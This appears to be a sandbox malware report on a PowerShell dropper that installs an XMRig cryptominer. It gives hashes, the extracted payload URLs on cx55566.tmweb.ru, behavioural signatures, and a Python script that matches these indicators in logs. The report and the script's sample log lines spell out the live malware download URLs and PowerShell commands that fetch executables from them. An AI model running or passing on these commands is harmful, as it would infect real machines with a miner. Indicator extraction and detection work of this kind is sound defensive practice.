2d82ec0905de054cd685e6a52e2d9442

General
Target

2d82ec0905de054cd685e6a52e2d9442

Size

4KB

Sample

211014-fskfvsgcb9

Score

10/10
MD5

2d82ec0905de054cd685e6a52e2d9442

SHA1

1fb5c5b876563affb7ee45872e286cf0ffddb965

SHA256

82f585a45f06cd6c344d3bf8fe6081a074ac38f83015d9675a2dc4e2363f5c20

SHA512

eeee0806ef980230966d3e6318d974fe6faf02b0b7952a1671cbc5fdff66c7cef68218483433a72ba6277ab9c5f556c7d3a39e2ad6851f42c4705f3d7a2666e4

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://cx55566.tmweb.ru/farm_money.exe

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://cx55566.tmweb.ru/monero-bandit.exe

Targets
Target

2d82ec0905de054cd685e6a52e2d9442

Signatures

  • xmrig

    Description

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner. The tool itself is legitimate; the signature is relevant here because the sample delivers it as a dropped payload (see the XMRig Miner Payload and Executes dropped EXE signatures below), which is the cryptojacking pattern rather than user-initiated mining.
  • XMRig Miner Payload

  • Blocklisted process makes network request

  • Downloads MZ/PE file

  • Executes dropped EXE

  • Loads dropped DLL

  • Drops file in System32 directory

  • Suspicious use of SetThreadContext
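The extracted config and the signatures above describe a PowerShell dropper that fetches two executables from cx55566.tmweb.ru and runs them. The following Python script is an added example and is not part of the sandbox report: it turns the report's own indicators (the two dropper URLs and the sample's four hashes) into a small matcher, runs it over constructed ScriptBlock-style log lines, and hashes an arbitrary byte string against the report's values. The log lines, the drop paths and the list of download primitives are constructed assumptions for illustration, not observed behaviour of this sample.

```python
import hashlib
import re
from urllib.parse import urlparse

# Indicators copied from the report: the dropper URLs from the extracted
# PowerShell config and the sample's own hashes.
DROPPER_URLS = [
    "http://cx55566.tmweb.ru/farm_money.exe",
    "http://cx55566.tmweb.ru/monero-bandit.exe",
]
SAMPLE_HASHES = {
    "md5": "2d82ec0905de054cd685e6a52e2d9442",
    "sha1": "1fb5c5b876563affb7ee45872e286cf0ffddb965",
    "sha256": "82f585a45f06cd6c344d3bf8fe6081a074ac38f83015d9675a2dc4e2363f5c20",
    "sha512": "eeee0806ef980230966d3e6318d974fe6faf02b0b7952a1671cbc5fdff66c7ce"
              "f68218483433a72ba6277ab9c5f556c7d3a39e2ad6851f42c4705f3d7a2666e4",
}

URL_RE = re.compile(r"""https?://[^\s'"()<>]+""", re.IGNORECASE)
# Download primitives commonly used by PowerShell droppers (assumed list; the
# report does not show which one this sample's script uses).
DOWNLOAD_RE = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer"
    r"|\biwr\b|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)


def indicator_set(urls):
    """Split the extracted URLs into host indicators and payload file names."""
    hosts = {urlparse(u).hostname for u in urls}
    names = {urlparse(u).path.rsplit("/", 1)[-1] for u in urls}
    return hosts, names


def scan_line(line, hosts, names):
    """Return (kind, value) hits for one log line: a host match, a payload-name
    match, and the download primitive used when a URL indicator is present."""
    hits = []
    for url in URL_RE.findall(line):
        parsed = urlparse(url)
        if parsed.hostname in hosts:
            hits.append(("host", parsed.hostname))
        name = parsed.path.rsplit("/", 1)[-1]
        if name in names:
            hits.append(("payload", name))
    if hits:
        m = DOWNLOAD_RE.search(line)
        if m:
            hits.append(("download", m.group(1)))
    return hits


def scan_lines(lines, urls=DROPPER_URLS):
    """Map 1-based line number -> hits for every line that matched an indicator."""
    hosts, names = indicator_set(urls)
    results = {}
    for n, line in enumerate(lines, 1):
        hits = scan_line(line, hosts, names)
        if hits:
            results[n] = hits
    return results


def file_hashes(data):
    """Compute the same four digests the report lists for a byte string."""
    return {name: hashlib.new(name, data).hexdigest() for name in SAMPLE_HASHES}


def matches_sample(data):
    """True only if every digest equals the report's value for this sample."""
    return file_hashes(data) == SAMPLE_HASHES


# Constructed log lines in ScriptBlock-logging style; not taken from the sandbox run.
SAMPLE_LOG = [
    "(New-Object Net.WebClient).DownloadFile('http://cx55566.tmweb.ru/farm_money.exe', 'C:\\Users\\Public\\u.exe')",
    "Invoke-WebRequest https://www.microsoft.com/ -OutFile index.html",
    "iwr http://cx55566.tmweb.ru/monero-bandit.exe -OutFile C:\\Users\\Public\\m.exe",
    "Start-Process 'http://example.com/farm_money.exe'",
]

if __name__ == "__main__":
    for n, hits in scan_lines(SAMPLE_LOG).items():
        print(n, hits)
    print("hash match:", matches_sample(b"not the sample"))
```

The fourth constructed line matters: the payload name matches on a host the report does not list, so the matcher surfaces it as a pivot rather than dropping it; treat such a hit as a lead to verify, not a confirmed detection. The hash check is exact on all four digests, so a hash pulled from the report with one digit mistyped will not match.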

MITRE ATT&CK Matrix

Tactic columns: Collection, Command and Control, Credential Access, Defense Evasion, Discovery, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Persistence, Privilege Escalation (no techniques are listed under any column in this extract).
Tasks

  • static1

  • behavioral1: 10/10

  • behavioral2: 10/10